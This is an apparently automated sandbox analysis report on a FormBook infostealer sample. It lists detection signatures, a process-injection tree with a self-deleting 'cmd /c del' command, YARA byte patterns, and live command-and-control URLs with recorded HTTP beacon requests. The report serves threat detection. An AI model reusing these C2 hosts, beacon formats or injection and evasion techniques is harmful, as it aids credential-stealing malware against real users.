Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H4vBtZsi8xAKaMm.exe

Overview

General Information

Sample Name:H4vBtZsi8xAKaMm.exe
Analysis ID:562156
MD5:7eabab04e4a6fdd45238e32ed81e222c
SHA1:e0e1dc469746f5e2e049ea4a93d9b09a9227b342
SHA256:b79d2d02fe777cfd64723ad9b3935b30c00cbc75614fcadbf867cce88df4a8fd
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • H4vBtZsi8xAKaMm.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe" MD5: 7EABAB04E4A6FDD45238E32ED81E222C)
    • MSBuild.exe (PID: 6100 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4480 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6880 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 4704 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • explorer.exe (PID: 4104 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      14.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        14.2.MSBuild.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        14.2.MSBuild.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        14.0.MSBuild.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          14.0.MSBuild.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary

          barindex
          Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
          Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3292, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4480
          Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3292, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4480
          Source: Process startedAuthor: juju4: Data: Command: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", CommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4480, ProcessCommandLine: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ProcessId: 6880

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: H4vBtZsi8xAKaMm.exeVirustotal: Detection: 65%Perma Link
          Source: H4vBtZsi8xAKaMm.exeMetadefender: Detection: 47%Perma Link
          Source: H4vBtZsi8xAKaMm.exeReversingLabs: Detection: 85%
          Yara detected FormBook
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.freeclothesonline.com/u1p5/Avira URL Cloud: Label: malware
          Source: http://www.freeclothesonline.com/u1p5/www.apeutah.comAvira URL Cloud: Label: malware
          Source: http://www.pbcgotv.com/u1p5/Avira URL Cloud: Label: malware
          Source: http://www.apeutah.com/u1p5/www.jovam.xyzAvira URL Cloud: Label: malware
          Source: http://www.pbcgotv.com/u1p5/www.kailibianminwang.comAvira URL Cloud: Label: malware
          Source: http://www.hokabrazil.com/u1p5/www.hornnbach.comAvira URL Cloud: Label: phishing
          Source: http://www.jovam.xyz/u1p5/www.hokabrazil.comAvira URL Cloud: Label: phishing
          Source: http://www.vinewineltd.com/u1p5/www.pbcgotv.comAvira URL Cloud: Label: malware
          Source: http://www.agengrosirfashion.com/u1p5/Avira URL Cloud: Label: malware
          Source: http://www.jovam.xyz/u1p5/Avira URL Cloud: Label: phishing
          Source: http://www.kailibianminwang.com/u1p5/Avira URL Cloud: Label: malware
          Source: http://www.agengrosirfashion.com/u1p5/www.dasmonica.comAvira URL Cloud: Label: malware
          Source: http://www.apeutah.com/u1p5/Avira URL Cloud: Label: malware
          Source: http://www.hokabrazil.com/u1p5/Avira URL Cloud: Label: phishing
          Source: http://www.hokabrazil.comAvira URL Cloud: Label: phishing
          Source: http://www.vinewineltd.com/u1p5/Avira URL Cloud: Label: malware
          Source: http://www.kailibianminwang.com/u1p5/.Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: H4vBtZsi8xAKaMm.exeJoe Sandbox ML: detected
          Source: 14.0.MSBuild.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.0.MSBuild.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: H4vBtZsi8xAKaMm.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jpRHjxHGRl\src\obj\Debug\760pQ.pdb source: H4vBtZsi8xAKaMm.exe
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 92.222.235.170 80
          Source: C:\Windows\explorer.exeDomain query: www.vzn2aai2qj.icu
          Source: C:\Windows\explorer.exeDomain query: www.shitcoin.team
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80
          Source: C:\Windows\explorer.exeDomain query: www.deutscheno1.com
          Source: C:\Windows\explorer.exeDomain query: www.bettingweb365.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.34.104 80
          Source: C:\Windows\explorer.exeDomain query: www.marymarinho.com
          Source: global trafficHTTP traffic detected: GET /u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT HTTP/1.1Host: www.shitcoin.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT HTTP/1.1Host: www.marymarinho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT HTTP/1.1Host: www.bettingweb365.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Fri, 28 Jan 2022 14:18:48 GMTConnection: closeContent-Length: 1118Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 3c 50 3e 0d 0a 3c 48 52 3e 0d 0a 3c 41 44 44 52 45 53 53 3e 0d 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 26 23 31 31 35 3b 26 23 31 30 34 3b 26 23 31 30 35 3b 26 23 31 31 36 3b 26 23 39 39 3b 26 23 31 31 31 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 34 36 3b 26 23 31 31 36 3b 26 23 31 30 31 3b 26 23 39 37 3b 26 23 31 30 39 3b 0d 0a 3c 2f 41 44 44 52 45 53 53 3e 0d 0a 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 3c 21 2d 2d 0d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0d 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0d 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0d 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0d 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0d 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0d 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0d 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0d 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0d 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0d 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.108.210
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: rundll32.exe, 00000013.00000002.801147155.000000000541F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD
          Source: explorer.exe, 0000001E.00000003.567450679.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.554536830.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.564216123.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605703155.000000000A889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.560927966.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.560220229.000000000AB48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.555403231.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.606908634.000000000AB41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 0000001E.00000003.568649594.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.565231882.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340630386.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agengrosirfashion.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agengrosirfashion.com/u1p5/
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agengrosirfashion.com/u1p5/www.dasmonica.com
          Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agengrosirfashion.comReferer:
          Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
